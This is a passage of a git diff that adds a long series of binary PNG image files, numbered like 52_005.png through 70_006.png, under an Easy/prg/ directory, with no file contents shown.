index 0000000..8d7b19c
Binary files /dev/null and b/Easy/prg/52_005.png differ
diff --git a/Easy/prg/52_006.png b/Easy/prg/52_006.png
new file mode 100644
index 0000000..123ca67
Binary files /dev/null and b/Easy/prg/52_006.png differ
diff --git a/Easy/prg/52_007.png b/Easy/prg/52_007.png
new file mode 100644
index 0000000..940c80a
Binary files /dev/null and b/Easy/prg/52_007.png differ
diff --git a/Easy/prg/52_008.png b/Easy/prg/52_008.png
new file mode 100644
index 0000000..df42a99
Binary files /dev/null and b/Easy/prg/52_008.png differ
diff --git a/Easy/prg/52_009.png b/Easy/prg/52_009.png
new file mode 100644
index 0000000..862e205
Binary files /dev/null and b/Easy/prg/52_009.png differ
diff --git a/Easy/prg/52_010.png b/Easy/prg/52_010.png
new file mode 100644
index 0000000..1caacdb
Binary files /dev/null and b/Easy/prg/52_010.png differ
diff --git a/Easy/prg/52_011.png b/Easy/prg/52_011.png
new file mode 100644
index 0000000..cb94935
Binary files /dev/null and b/Easy/prg/52_011.png differ
diff --git a/Easy/prg/52_012.png b/Easy/prg/52_012.png
new file mode 100644
index 0000000..2514e9b
Binary files /dev/null and b/Easy/prg/52_012.png differ
diff --git a/Easy/prg/52_013.png b/Easy/prg/52_013.png
new file mode 100644
index 0000000..9f14033
Binary files /dev/null and b/Easy/prg/52_013.png differ
diff --git a/Easy/prg/53_001.png b/Easy/prg/53_001.png
new file mode 100644
index 0000000..59aff5a
Binary files /dev/null and b/Easy/prg/53_001.png differ
diff --git a/Easy/prg/53_002.png b/Easy/prg/53_002.png
new file mode 100644
index 0000000..86c9746
Binary files /dev/null and b/Easy/prg/53_002.png differ
diff --git a/Easy/prg/53_003.png b/Easy/prg/53_003.png
new file mode 100644
index 0000000..f7733e9
Binary files /dev/null and b/Easy/prg/53_003.png differ
diff --git a/Easy/prg/53_004.png b/Easy/prg/53_004.png
new file mode 100644
index 0000000..2887a14
Binary files /dev/null and b/Easy/prg/53_004.png differ
diff --git a/Easy/prg/53_005.png b/Easy/prg/53_005.png
new file mode 100644
index 0000000..6a51622
Binary files /dev/null and b/Easy/prg/53_005.png differ
diff --git a/Easy/prg/53_006.png b/Easy/prg/53_006.png
new file mode 100644
index 0000000..ceb0800
Binary files /dev/null and b/Easy/prg/53_006.png differ
diff --git a/Easy/prg/53_007.png b/Easy/prg/53_007.png
new file mode 100644
index 0000000..76038e9
Binary files /dev/null and b/Easy/prg/53_007.png differ
diff --git a/Easy/prg/53_008.png b/Easy/prg/53_008.png
new file mode 100644
index 0000000..8274358
Binary files /dev/null and b/Easy/prg/53_008.png differ
diff --git a/Easy/prg/53_009.png b/Easy/prg/53_009.png
new file mode 100644
index 0000000..65aa025
Binary files /dev/null and b/Easy/prg/53_009.png differ
diff --git a/Easy/prg/53_010.png b/Easy/prg/53_010.png
new file mode 100644
index 0000000..76c3ab4
Binary files /dev/null and b/Easy/prg/53_010.png differ
diff --git a/Easy/prg/53_011.png b/Easy/prg/53_011.png
new file mode 100644
index 0000000..2fc5bc9
Binary files /dev/null and b/Easy/prg/53_011.png differ
diff --git a/Easy/prg/53_012.png b/Easy/prg/53_012.png
new file mode 100644
index 0000000..e0550ad
Binary files /dev/null and b/Easy/prg/53_012.png differ
diff --git a/Easy/prg/53_013.png b/Easy/prg/53_013.png
new file mode 100644
index 0000000..c088f94
Binary files /dev/null and b/Easy/prg/53_013.png differ
diff --git a/Easy/prg/53_014.png b/Easy/prg/53_014.png
new file mode 100644
index 0000000..4f600ff
Binary files /dev/null and b/Easy/prg/53_014.png differ
diff --git a/Easy/prg/53_015.png b/Easy/prg/53_015.png
new file mode 100644
index 0000000..df398fd
Binary files /dev/null and b/Easy/prg/53_015.png differ
diff --git a/Easy/prg/53_016.png b/Easy/prg/53_016.png
new file mode 100644
index 0000000..666485c
Binary files /dev/null and b/Easy/prg/53_016.png differ
diff --git a/Easy/prg/53_017.png b/Easy/prg/53_017.png
new file mode 100644
index 0000000..0e6b7c2
Binary files /dev/null and b/Easy/prg/53_017.png differ
diff --git a/Easy/prg/53_018.png b/Easy/prg/53_018.png
new file mode 100644
index 0000000..7ace34c
Binary files /dev/null and b/Easy/prg/53_018.png differ
diff --git a/Easy/prg/53_019.png b/Easy/prg/53_019.png
new file mode 100644
index 0000000..19dad25
Binary files /dev/null and b/Easy/prg/53_019.png differ
diff --git a/Easy/prg/54_001.png b/Easy/prg/54_001.png
new file mode 100644
index 0000000..62a98ec
Binary files /dev/null and b/Easy/prg/54_001.png differ
diff --git a/Easy/prg/54_002.png b/Easy/prg/54_002.png
new file mode 100644
index 0000000..9d572e8
Binary files /dev/null and b/Easy/prg/54_002.png differ
diff --git a/Easy/prg/54_003.png b/Easy/prg/54_003.png
new file mode 100644
index 0000000..98bacec
Binary files /dev/null and b/Easy/prg/54_003.png differ
diff --git a/Easy/prg/54_004.png b/Easy/prg/54_004.png
new file mode 100644
index 0000000..cabd8e7
Binary files /dev/null and b/Easy/prg/54_004.png differ
diff --git a/Easy/prg/54_005.png b/Easy/prg/54_005.png
new file mode 100644
index 0000000..d0fa59b
Binary files /dev/null and b/Easy/prg/54_005.png differ
diff --git a/Easy/prg/54_006.png b/Easy/prg/54_006.png
new file mode 100644
index 0000000..e1eff3e
Binary files /dev/null and b/Easy/prg/54_006.png differ
diff --git a/Easy/prg/54_007.png b/Easy/prg/54_007.png
new file mode 100644
index 0000000..a7625ff
Binary files /dev/null and b/Easy/prg/54_007.png differ
diff --git a/Easy/prg/54_008.png b/Easy/prg/54_008.png
new file mode 100644
index 0000000..50225d8
Binary files /dev/null and b/Easy/prg/54_008.png differ
diff --git a/Easy/prg/54_009.png b/Easy/prg/54_009.png
new file mode 100644
index 0000000..368957e
Binary files /dev/null and b/Easy/prg/54_009.png differ
diff --git a/Easy/prg/54_010.png b/Easy/prg/54_010.png
new file mode 100644
index 0000000..8aece01
Binary files /dev/null and b/Easy/prg/54_010.png differ
diff --git a/Easy/prg/54_011.png b/Easy/prg/54_011.png
new file mode 100644
index 0000000..6e4931d
Binary files /dev/null and b/Easy/prg/54_011.png differ
diff --git a/Easy/prg/54_012.png b/Easy/prg/54_012.png
new file mode 100644
index 0000000..0ea7b23
Binary files /dev/null and b/Easy/prg/54_012.png differ
diff --git a/Easy/prg/54_013.png b/Easy/prg/54_013.png
new file mode 100644
index 0000000..8d0bda4
Binary files /dev/null and b/Easy/prg/54_013.png differ
diff --git a/Easy/prg/54_014.png b/Easy/prg/54_014.png
new file mode 100644
index 0000000..6e857fa
Binary files /dev/null and b/Easy/prg/54_014.png differ
diff --git a/Easy/prg/54_015.png b/Easy/prg/54_015.png
new file mode 100644
index 0000000..7afadd6
Binary files /dev/null and b/Easy/prg/54_015.png differ
diff --git a/Easy/prg/54_016.png b/Easy/prg/54_016.png
new file mode 100644
index 0000000..d3d7d70
Binary files /dev/null and b/Easy/prg/54_016.png differ
diff --git a/Easy/prg/54_017.png b/Easy/prg/54_017.png
new file mode 100644
index 0000000..a00794d
Binary files /dev/null and b/Easy/prg/54_017.png differ
diff --git a/Easy/prg/54_018.png b/Easy/prg/54_018.png
new file mode 100644
index 0000000..4b45366
Binary files /dev/null and b/Easy/prg/54_018.png differ
diff --git a/Easy/prg/54_019.png b/Easy/prg/54_019.png
new file mode 100644
index 0000000..224b320
Binary files /dev/null and b/Easy/prg/54_019.png differ
diff --git a/Easy/prg/55_001.png b/Easy/prg/55_001.png
new file mode 100644
index 0000000..a318676
Binary files /dev/null and b/Easy/prg/55_001.png differ
diff --git a/Easy/prg/55_002.png b/Easy/prg/55_002.png
new file mode 100644
index 0000000..c2acf67
Binary files /dev/null and b/Easy/prg/55_002.png differ
diff --git a/Easy/prg/55_003.png b/Easy/prg/55_003.png
new file mode 100644
index 0000000..1f58e54
Binary files /dev/null and b/Easy/prg/55_003.png differ
diff --git a/Easy/prg/55_004.png b/Easy/prg/55_004.png
new file mode 100644
index 0000000..58cdee4
Binary files /dev/null and b/Easy/prg/55_004.png differ
diff --git a/Easy/prg/55_005.png b/Easy/prg/55_005.png
new file mode 100644
index 0000000..bb02a4e
Binary files /dev/null and b/Easy/prg/55_005.png differ
diff --git a/Easy/prg/55_006.png b/Easy/prg/55_006.png
new file mode 100644
index 0000000..34f5a16
Binary files /dev/null and b/Easy/prg/55_006.png differ
diff --git a/Easy/prg/55_007.png b/Easy/prg/55_007.png
new file mode 100644
index 0000000..79a67f8
Binary files /dev/null and b/Easy/prg/55_007.png differ
diff --git a/Easy/prg/55_008.png b/Easy/prg/55_008.png
new file mode 100644
index 0000000..c4cf7c1
Binary files /dev/null and b/Easy/prg/55_008.png differ
diff --git a/Easy/prg/55_009.png b/Easy/prg/55_009.png
new file mode 100644
index 0000000..0df0c8c
Binary files /dev/null and b/Easy/prg/55_009.png differ
diff --git a/Easy/prg/55_010.png b/Easy/prg/55_010.png
new file mode 100644
index 0000000..8522a73
Binary files /dev/null and b/Easy/prg/55_010.png differ
diff --git a/Easy/prg/55_011.png b/Easy/prg/55_011.png
new file mode 100644
index 0000000..fd3eec5
Binary files /dev/null and b/Easy/prg/55_011.png differ
diff --git a/Easy/prg/55_012.png b/Easy/prg/55_012.png
new file mode 100644
index 0000000..6033377
Binary files /dev/null and b/Easy/prg/55_012.png differ
diff --git a/Easy/prg/55_013.png b/Easy/prg/55_013.png
new file mode 100644
index 0000000..19f007a
Binary files /dev/null and b/Easy/prg/55_013.png differ
diff --git a/Easy/prg/55_014.png b/Easy/prg/55_014.png
new file mode 100644
index 0000000..04df48d
Binary files /dev/null and b/Easy/prg/55_014.png differ
diff --git a/Easy/prg/55_015.png b/Easy/prg/55_015.png
new file mode 100644
index 0000000..b006f83
Binary files /dev/null and b/Easy/prg/55_015.png differ
diff --git a/Easy/prg/55_016.png b/Easy/prg/55_016.png
new file mode 100644
index 0000000..0f2ddb7
Binary files /dev/null and b/Easy/prg/55_016.png differ
diff --git a/Easy/prg/55_017.png b/Easy/prg/55_017.png
new file mode 100644
index 0000000..e349e73
Binary files /dev/null and b/Easy/prg/55_017.png differ
diff --git a/Easy/prg/56_001.png b/Easy/prg/56_001.png
new file mode 100644
index 0000000..704250f
Binary files /dev/null and b/Easy/prg/56_001.png differ
diff --git a/Easy/prg/56_002.png b/Easy/prg/56_002.png
new file mode 100644
index 0000000..6e6ce07
Binary files /dev/null and b/Easy/prg/56_002.png differ
diff --git a/Easy/prg/56_003.png b/Easy/prg/56_003.png
new file mode 100644
index 0000000..1ac7272
Binary files /dev/null and b/Easy/prg/56_003.png differ
diff --git a/Easy/prg/56_004.png b/Easy/prg/56_004.png
new file mode 100644
index 0000000..56c6517
Binary files /dev/null and b/Easy/prg/56_004.png differ
diff --git a/Easy/prg/56_005.png b/Easy/prg/56_005.png
new file mode 100644
index 0000000..c1f7120
Binary files /dev/null and b/Easy/prg/56_005.png differ
diff --git a/Easy/prg/56_006.png b/Easy/prg/56_006.png
new file mode 100644
index 0000000..8b45fc2
Binary files /dev/null and b/Easy/prg/56_006.png differ
diff --git a/Easy/prg/57_001.png b/Easy/prg/57_001.png
new file mode 100644
index 0000000..9a1ffc3
Binary files /dev/null and b/Easy/prg/57_001.png differ
diff --git a/Easy/prg/57_002.png b/Easy/prg/57_002.png
new file mode 100644
index 0000000..b609c3d
Binary files /dev/null and b/Easy/prg/57_002.png differ
diff --git a/Easy/prg/57_003.png b/Easy/prg/57_003.png
new file mode 100644
index 0000000..9620b36
Binary files /dev/null and b/Easy/prg/57_003.png differ
diff --git a/Easy/prg/57_004.png b/Easy/prg/57_004.png
new file mode 100644
index 0000000..357e043
Binary files /dev/null and b/Easy/prg/57_004.png differ
diff --git a/Easy/prg/58_001.png b/Easy/prg/58_001.png
new file mode 100644
index 0000000..1918881
Binary files /dev/null and b/Easy/prg/58_001.png differ
diff --git a/Easy/prg/58_002.png b/Easy/prg/58_002.png
new file mode 100644
index 0000000..9f3b96b
Binary files /dev/null and b/Easy/prg/58_002.png differ
diff --git a/Easy/prg/58_003.png b/Easy/prg/58_003.png
new file mode 100644
index 0000000..10eeb7b
Binary files /dev/null and b/Easy/prg/58_003.png differ
diff --git a/Easy/prg/58_004.png b/Easy/prg/58_004.png
new file mode 100644
index 0000000..81954f7
Binary files /dev/null and b/Easy/prg/58_004.png differ
diff --git a/Easy/prg/58_005.png b/Easy/prg/58_005.png
new file mode 100644
index 0000000..bbee00e
Binary files /dev/null and b/Easy/prg/58_005.png differ
diff --git a/Easy/prg/58_006.png b/Easy/prg/58_006.png
new file mode 100644
index 0000000..b7a9564
Binary files /dev/null and b/Easy/prg/58_006.png differ
diff --git a/Easy/prg/58_007.png b/Easy/prg/58_007.png
new file mode 100644
index 0000000..55a7537
Binary files /dev/null and b/Easy/prg/58_007.png differ
diff --git a/Easy/prg/59_001.png b/Easy/prg/59_001.png
new file mode 100644
index 0000000..7537016
Binary files /dev/null and b/Easy/prg/59_001.png differ
diff --git a/Easy/prg/59_002.png b/Easy/prg/59_002.png
new file mode 100644
index 0000000..74cc148
Binary files /dev/null and b/Easy/prg/59_002.png differ
diff --git a/Easy/prg/59_003.png b/Easy/prg/59_003.png
new file mode 100644
index 0000000..ea087c7
Binary files /dev/null and b/Easy/prg/59_003.png differ
diff --git a/Easy/prg/59_004.png b/Easy/prg/59_004.png
new file mode 100644
index 0000000..cb29c23
Binary files /dev/null and b/Easy/prg/59_004.png differ
diff --git a/Easy/prg/59_005.png b/Easy/prg/59_005.png
new file mode 100644
index 0000000..5cf9d3b
Binary files /dev/null and b/Easy/prg/59_005.png differ
diff --git a/Easy/prg/59_006.png b/Easy/prg/59_006.png
new file mode 100644
index 0000000..ca45304
Binary files /dev/null and b/Easy/prg/59_006.png differ
diff --git a/Easy/prg/5_001.png b/Easy/prg/5_001.png
new file mode 100644
index 0000000..a3712dd
Binary files /dev/null and b/Easy/prg/5_001.png differ
diff --git a/Easy/prg/5_002.png b/Easy/prg/5_002.png
new file mode 100644
index 0000000..f5aab23
Binary files /dev/null and b/Easy/prg/5_002.png differ
diff --git a/Easy/prg/60_001.png b/Easy/prg/60_001.png
new file mode 100644
index 0000000..fe8c8e1
Binary files /dev/null and b/Easy/prg/60_001.png differ
diff --git a/Easy/prg/60_002.png b/Easy/prg/60_002.png
new file mode 100644
index 0000000..8831b8b
Binary files /dev/null and b/Easy/prg/60_002.png differ
diff --git a/Easy/prg/60_003.png b/Easy/prg/60_003.png
new file mode 100644
index 0000000..3d7b471
Binary files /dev/null and b/Easy/prg/60_003.png differ
diff --git a/Easy/prg/60_004.png b/Easy/prg/60_004.png
new file mode 100644
index 0000000..df41cb1
Binary files /dev/null and b/Easy/prg/60_004.png differ
diff --git a/Easy/prg/60_005.png b/Easy/prg/60_005.png
new file mode 100644
index 0000000..aa150c9
Binary files /dev/null and b/Easy/prg/60_005.png differ
diff --git a/Easy/prg/60_006.png b/Easy/prg/60_006.png
new file mode 100644
index 0000000..8f210f0
Binary files /dev/null and b/Easy/prg/60_006.png differ
diff --git a/Easy/prg/60_007.png b/Easy/prg/60_007.png
new file mode 100644
index 0000000..09510a6
Binary files /dev/null and b/Easy/prg/60_007.png differ
diff --git a/Easy/prg/60_008.png b/Easy/prg/60_008.png
new file mode 100644
index 0000000..71d3e30
Binary files /dev/null and b/Easy/prg/60_008.png differ
diff --git a/Easy/prg/60_009.png b/Easy/prg/60_009.png
new file mode 100644
index 0000000..1ae7fef
Binary files /dev/null and b/Easy/prg/60_009.png differ
diff --git a/Easy/prg/60_010.png b/Easy/prg/60_010.png
new file mode 100644
index 0000000..8fe97ef
Binary files /dev/null and b/Easy/prg/60_010.png differ
diff --git a/Easy/prg/61_001.png b/Easy/prg/61_001.png
new file mode 100644
index 0000000..88a15cf
Binary files /dev/null and b/Easy/prg/61_001.png differ
diff --git a/Easy/prg/61_002.png b/Easy/prg/61_002.png
new file mode 100644
index 0000000..a0599f4
Binary files /dev/null and b/Easy/prg/61_002.png differ
diff --git a/Easy/prg/61_003.png b/Easy/prg/61_003.png
new file mode 100644
index 0000000..6fac5f3
Binary files /dev/null and b/Easy/prg/61_003.png differ
diff --git a/Easy/prg/61_004.png b/Easy/prg/61_004.png
new file mode 100644
index 0000000..f18fc88
Binary files /dev/null and b/Easy/prg/61_004.png differ
diff --git a/Easy/prg/61_005.png b/Easy/prg/61_005.png
new file mode 100644
index 0000000..31d1527
Binary files /dev/null and b/Easy/prg/61_005.png differ
diff --git a/Easy/prg/61_006.png b/Easy/prg/61_006.png
new file mode 100644
index 0000000..a3a6ccf
Binary files /dev/null and b/Easy/prg/61_006.png differ
diff --git a/Easy/prg/61_007.png b/Easy/prg/61_007.png
new file mode 100644
index 0000000..fa90ad6
Binary files /dev/null and b/Easy/prg/61_007.png differ
diff --git a/Easy/prg/61_008.png b/Easy/prg/61_008.png
new file mode 100644
index 0000000..5af2ce2
Binary files /dev/null and b/Easy/prg/61_008.png differ
diff --git a/Easy/prg/61_009.png b/Easy/prg/61_009.png
new file mode 100644
index 0000000..0cfd3e5
Binary files /dev/null and b/Easy/prg/61_009.png differ
diff --git a/Easy/prg/61_010.png b/Easy/prg/61_010.png
new file mode 100644
index 0000000..ca68577
Binary files /dev/null and b/Easy/prg/61_010.png differ
diff --git a/Easy/prg/61_011.png b/Easy/prg/61_011.png
new file mode 100644
index 0000000..1642b9a
Binary files /dev/null and b/Easy/prg/61_011.png differ
diff --git a/Easy/prg/61_012.png b/Easy/prg/61_012.png
new file mode 100644
index 0000000..b1c55a7
Binary files /dev/null and b/Easy/prg/61_012.png differ
diff --git a/Easy/prg/61_013.png b/Easy/prg/61_013.png
new file mode 100644
index 0000000..e074dc3
Binary files /dev/null and b/Easy/prg/61_013.png differ
diff --git a/Easy/prg/61_014.png b/Easy/prg/61_014.png
new file mode 100644
index 0000000..fb3bb76
Binary files /dev/null and b/Easy/prg/61_014.png differ
diff --git a/Easy/prg/62_001.png b/Easy/prg/62_001.png
new file mode 100644
index 0000000..080738c
Binary files /dev/null and b/Easy/prg/62_001.png differ
diff --git a/Easy/prg/62_002.png b/Easy/prg/62_002.png
new file mode 100644
index 0000000..c48b7f3
Binary files /dev/null and b/Easy/prg/62_002.png differ
diff --git a/Easy/prg/62_003.png b/Easy/prg/62_003.png
new file mode 100644
index 0000000..ea6bfe1
Binary files /dev/null and b/Easy/prg/62_003.png differ
diff --git a/Easy/prg/62_004.png b/Easy/prg/62_004.png
new file mode 100644
index 0000000..856865e
Binary files /dev/null and b/Easy/prg/62_004.png differ
diff --git a/Easy/prg/63_001.png b/Easy/prg/63_001.png
new file mode 100644
index 0000000..93c898f
Binary files /dev/null and b/Easy/prg/63_001.png differ
diff --git a/Easy/prg/63_002.png b/Easy/prg/63_002.png
new file mode 100644
index 0000000..a34e2e0
Binary files /dev/null and b/Easy/prg/63_002.png differ
diff --git a/Easy/prg/63_003.png b/Easy/prg/63_003.png
new file mode 100644
index 0000000..2d101fc
Binary files /dev/null and b/Easy/prg/63_003.png differ
diff --git a/Easy/prg/64_001.png b/Easy/prg/64_001.png
new file mode 100644
index 0000000..8eabea9
Binary files /dev/null and b/Easy/prg/64_001.png differ
diff --git a/Easy/prg/64_002.png b/Easy/prg/64_002.png
new file mode 100644
index 0000000..2e2651e
Binary files /dev/null and b/Easy/prg/64_002.png differ
diff --git a/Easy/prg/64_003.png b/Easy/prg/64_003.png
new file mode 100644
index 0000000..cd7074f
Binary files /dev/null and b/Easy/prg/64_003.png differ
diff --git a/Easy/prg/64_004.png b/Easy/prg/64_004.png
new file mode 100644
index 0000000..35f04a7
Binary files /dev/null and b/Easy/prg/64_004.png differ
diff --git a/Easy/prg/64_005.png b/Easy/prg/64_005.png
new file mode 100644
index 0000000..34d1a24
Binary files /dev/null and b/Easy/prg/64_005.png differ
diff --git a/Easy/prg/64_006.png b/Easy/prg/64_006.png
new file mode 100644
index 0000000..582cf08
Binary files /dev/null and b/Easy/prg/64_006.png differ
diff --git a/Easy/prg/64_007.png b/Easy/prg/64_007.png
new file mode 100644
index 0000000..3444ba9
Binary files /dev/null and b/Easy/prg/64_007.png differ
diff --git a/Easy/prg/64_008.png b/Easy/prg/64_008.png
new file mode 100644
index 0000000..b421d78
Binary files /dev/null and b/Easy/prg/64_008.png differ
diff --git a/Easy/prg/64_009.png b/Easy/prg/64_009.png
new file mode 100644
index 0000000..32a9bef
Binary files /dev/null and b/Easy/prg/64_009.png differ
diff --git a/Easy/prg/64_010.png b/Easy/prg/64_010.png
new file mode 100644
index 0000000..4cfd20f
Binary files /dev/null and b/Easy/prg/64_010.png differ
diff --git a/Easy/prg/64_011.png b/Easy/prg/64_011.png
new file mode 100644
index 0000000..09b99b6
Binary files /dev/null and b/Easy/prg/64_011.png differ
diff --git a/Easy/prg/64_012.png b/Easy/prg/64_012.png
new file mode 100644
index 0000000..7451ed5
Binary files /dev/null and b/Easy/prg/64_012.png differ
diff --git a/Easy/prg/64_013.png b/Easy/prg/64_013.png
new file mode 100644
index 0000000..e816e2a
Binary files /dev/null and b/Easy/prg/64_013.png differ
diff --git a/Easy/prg/64_014.png b/Easy/prg/64_014.png
new file mode 100644
index 0000000..d002db2
Binary files /dev/null and b/Easy/prg/64_014.png differ
diff --git a/Easy/prg/64_015.png b/Easy/prg/64_015.png
new file mode 100644
index 0000000..48c79e2
Binary files /dev/null and b/Easy/prg/64_015.png differ
diff --git a/Easy/prg/64_016.png b/Easy/prg/64_016.png
new file mode 100644
index 0000000..ffa2420
Binary files /dev/null and b/Easy/prg/64_016.png differ
diff --git a/Easy/prg/64_017.png b/Easy/prg/64_017.png
new file mode 100644
index 0000000..643da18
Binary files /dev/null and b/Easy/prg/64_017.png differ
diff --git a/Easy/prg/64_018.png b/Easy/prg/64_018.png
new file mode 100644
index 0000000..a7c3a86
Binary files /dev/null and b/Easy/prg/64_018.png differ
diff --git a/Easy/prg/64_019.png b/Easy/prg/64_019.png
new file mode 100644
index 0000000..f71bc4c
Binary files /dev/null and b/Easy/prg/64_019.png differ
diff --git a/Easy/prg/65_001.png b/Easy/prg/65_001.png
new file mode 100644
index 0000000..f28e465
Binary files /dev/null and b/Easy/prg/65_001.png differ
diff --git a/Easy/prg/65_002.png b/Easy/prg/65_002.png
new file mode 100644
index 0000000..6d64e5a
Binary files /dev/null and b/Easy/prg/65_002.png differ
diff --git a/Easy/prg/65_003.png b/Easy/prg/65_003.png
new file mode 100644
index 0000000..65ce542
Binary files /dev/null and b/Easy/prg/65_003.png differ
diff --git a/Easy/prg/65_004.png b/Easy/prg/65_004.png
new file mode 100644
index 0000000..43b07db
Binary files /dev/null and b/Easy/prg/65_004.png differ
diff --git a/Easy/prg/65_005.png b/Easy/prg/65_005.png
new file mode 100644
index 0000000..dd083a0
Binary files /dev/null and b/Easy/prg/65_005.png differ
diff --git a/Easy/prg/65_006.png b/Easy/prg/65_006.png
new file mode 100644
index 0000000..de715f3
Binary files /dev/null and b/Easy/prg/65_006.png differ
diff --git a/Easy/prg/65_007.png b/Easy/prg/65_007.png
new file mode 100644
index 0000000..b3b6e38
Binary files /dev/null and b/Easy/prg/65_007.png differ
diff --git a/Easy/prg/65_008.png b/Easy/prg/65_008.png
new file mode 100644
index 0000000..3521937
Binary files /dev/null and b/Easy/prg/65_008.png differ
diff --git a/Easy/prg/65_009.png b/Easy/prg/65_009.png
new file mode 100644
index 0000000..534f9a6
Binary files /dev/null and b/Easy/prg/65_009.png differ
diff --git a/Easy/prg/65_010.png b/Easy/prg/65_010.png
new file mode 100644
index 0000000..113f62d
Binary files /dev/null and b/Easy/prg/65_010.png differ
diff --git a/Easy/prg/65_011.png b/Easy/prg/65_011.png
new file mode 100644
index 0000000..965c049
Binary files /dev/null and b/Easy/prg/65_011.png differ
diff --git a/Easy/prg/66_001.png b/Easy/prg/66_001.png
new file mode 100644
index 0000000..5b42699
Binary files /dev/null and b/Easy/prg/66_001.png differ
diff --git a/Easy/prg/66_002.png b/Easy/prg/66_002.png
new file mode 100644
index 0000000..54bae55
Binary files /dev/null and b/Easy/prg/66_002.png differ
diff --git a/Easy/prg/66_003.png b/Easy/prg/66_003.png
new file mode 100644
index 0000000..16c6543
Binary files /dev/null and b/Easy/prg/66_003.png differ
diff --git a/Easy/prg/66_004.png b/Easy/prg/66_004.png
new file mode 100644
index 0000000..ca355e2
Binary files /dev/null and b/Easy/prg/66_004.png differ
diff --git a/Easy/prg/66_005.png b/Easy/prg/66_005.png
new file mode 100644
index 0000000..b6abc50
Binary files /dev/null and b/Easy/prg/66_005.png differ
diff --git a/Easy/prg/66_006.png b/Easy/prg/66_006.png
new file mode 100644
index 0000000..de00aa7
Binary files /dev/null and b/Easy/prg/66_006.png differ
diff --git a/Easy/prg/66_007.png b/Easy/prg/66_007.png
new file mode 100644
index 0000000..1c8b7b8
Binary files /dev/null and b/Easy/prg/66_007.png differ
diff --git a/Easy/prg/66_008.png b/Easy/prg/66_008.png
new file mode 100644
index 0000000..25ca51a
Binary files /dev/null and b/Easy/prg/66_008.png differ
diff --git a/Easy/prg/66_009.png b/Easy/prg/66_009.png
new file mode 100644
index 0000000..9c9f2f5
Binary files /dev/null and b/Easy/prg/66_009.png differ
diff --git a/Easy/prg/67_001.png b/Easy/prg/67_001.png
new file mode 100644
index 0000000..a438d5c
Binary files /dev/null and b/Easy/prg/67_001.png differ
diff --git a/Easy/prg/67_002.png b/Easy/prg/67_002.png
new file mode 100644
index 0000000..325c4b3
Binary files /dev/null and b/Easy/prg/67_002.png differ
diff --git a/Easy/prg/68_001.png b/Easy/prg/68_001.png
new file mode 100644
index 0000000..1107c31
Binary files /dev/null and b/Easy/prg/68_001.png differ
diff --git a/Easy/prg/68_002.png b/Easy/prg/68_002.png
new file mode 100644
index 0000000..1696ac4
Binary files /dev/null and b/Easy/prg/68_002.png differ
diff --git a/Easy/prg/68_003.png b/Easy/prg/68_003.png
new file mode 100644
index 0000000..c31441c
Binary files /dev/null and b/Easy/prg/68_003.png differ
diff --git a/Easy/prg/68_004.png b/Easy/prg/68_004.png
new file mode 100644
index 0000000..6c72894
Binary files /dev/null and b/Easy/prg/68_004.png differ
diff --git a/Easy/prg/68_005.png b/Easy/prg/68_005.png
new file mode 100644
index 0000000..e319863
Binary files /dev/null and b/Easy/prg/68_005.png differ
diff --git a/Easy/prg/68_006.png b/Easy/prg/68_006.png
new file mode 100644
index 0000000..ca305f6
Binary files /dev/null and b/Easy/prg/68_006.png differ
diff --git a/Easy/prg/68_007.png b/Easy/prg/68_007.png
new file mode 100644
index 0000000..6beccb8
Binary files /dev/null and b/Easy/prg/68_007.png differ
diff --git a/Easy/prg/68_008.png b/Easy/prg/68_008.png
new file mode 100644
index 0000000..f5d372b
Binary files /dev/null and b/Easy/prg/68_008.png differ
diff --git a/Easy/prg/68_009.png b/Easy/prg/68_009.png
new file mode 100644
index 0000000..0cd0cfc
Binary files /dev/null and b/Easy/prg/68_009.png differ
diff --git a/Easy/prg/69_001.png b/Easy/prg/69_001.png
new file mode 100644
index 0000000..8ec58ef
Binary files /dev/null and b/Easy/prg/69_001.png differ
diff --git a/Easy/prg/69_002.png b/Easy/prg/69_002.png
new file mode 100644
index 0000000..0c8fd19
Binary files /dev/null and b/Easy/prg/69_002.png differ
diff --git a/Easy/prg/6_001.png b/Easy/prg/6_001.png
new file mode 100644
index 0000000..9d65280
Binary files /dev/null and b/Easy/prg/6_001.png differ
diff --git a/Easy/prg/6_002.png b/Easy/prg/6_002.png
new file mode 100644
index 0000000..b534088
Binary files /dev/null and b/Easy/prg/6_002.png differ
diff --git a/Easy/prg/6_003.png b/Easy/prg/6_003.png
new file mode 100644
index 0000000..a9d5292
Binary files /dev/null and b/Easy/prg/6_003.png differ
diff --git a/Easy/prg/6_004.png b/Easy/prg/6_004.png
new file mode 100644
index 0000000..b420fc8
Binary files /dev/null and b/Easy/prg/6_004.png differ
diff --git a/Easy/prg/6_005.png b/Easy/prg/6_005.png
new file mode 100644
index 0000000..5b465ac
Binary files /dev/null and b/Easy/prg/6_005.png differ
diff --git a/Easy/prg/6_006.png b/Easy/prg/6_006.png
new file mode 100644
index 0000000..1ac2f3e
Binary files /dev/null and b/Easy/prg/6_006.png differ
diff --git a/Easy/prg/6_007.png b/Easy/prg/6_007.png
new file mode 100644
index 0000000..0e69668
Binary files /dev/null and b/Easy/prg/6_007.png differ
diff --git a/Easy/prg/6_008.png b/Easy/prg/6_008.png
new file mode 100644
index 0000000..7e0aafb
Binary files /dev/null and b/Easy/prg/6_008.png differ
diff --git a/Easy/prg/6_009.png b/Easy/prg/6_009.png
new file mode 100644
index 0000000..e5c7d58
Binary files /dev/null and b/Easy/prg/6_009.png differ
diff --git a/Easy/prg/6_010.png b/Easy/prg/6_010.png
new file mode 100644
index 0000000..32972d8
Binary files /dev/null and b/Easy/prg/6_010.png differ
diff --git a/Easy/prg/70_001.png b/Easy/prg/70_001.png
new file mode 100644
index 0000000..44e71cb
Binary files /dev/null and b/Easy/prg/70_001.png differ
diff --git a/Easy/prg/70_002.png b/Easy/prg/70_002.png
new file mode 100644
index 0000000..b41d82c
Binary files /dev/null and b/Easy/prg/70_002.png differ
diff --git a/Easy/prg/70_003.png b/Easy/prg/70_003.png
new file mode 100644
index 0000000..a21519e
Binary files /dev/null and b/Easy/prg/70_003.png differ
diff --git a/Easy/prg/70_004.png b/Easy/prg/70_004.png
new file mode 100644
index 0000000..52d53f4
Binary files /dev/null and b/Easy/prg/70_004.png differ
diff --git a/Easy/prg/70_005.png b/Easy/prg/70_005.png
new file mode 100644
index 0000000..b9f75a2
Binary files /dev/null and b/Easy/prg/70_005.png differ
diff --git a/Easy/prg/70_006.png b/Easy/prg/70_006.png
new file mode 100644
index 0000000..166e206
Binary files /dev/null and b/Easy/prg/70_006.png differ
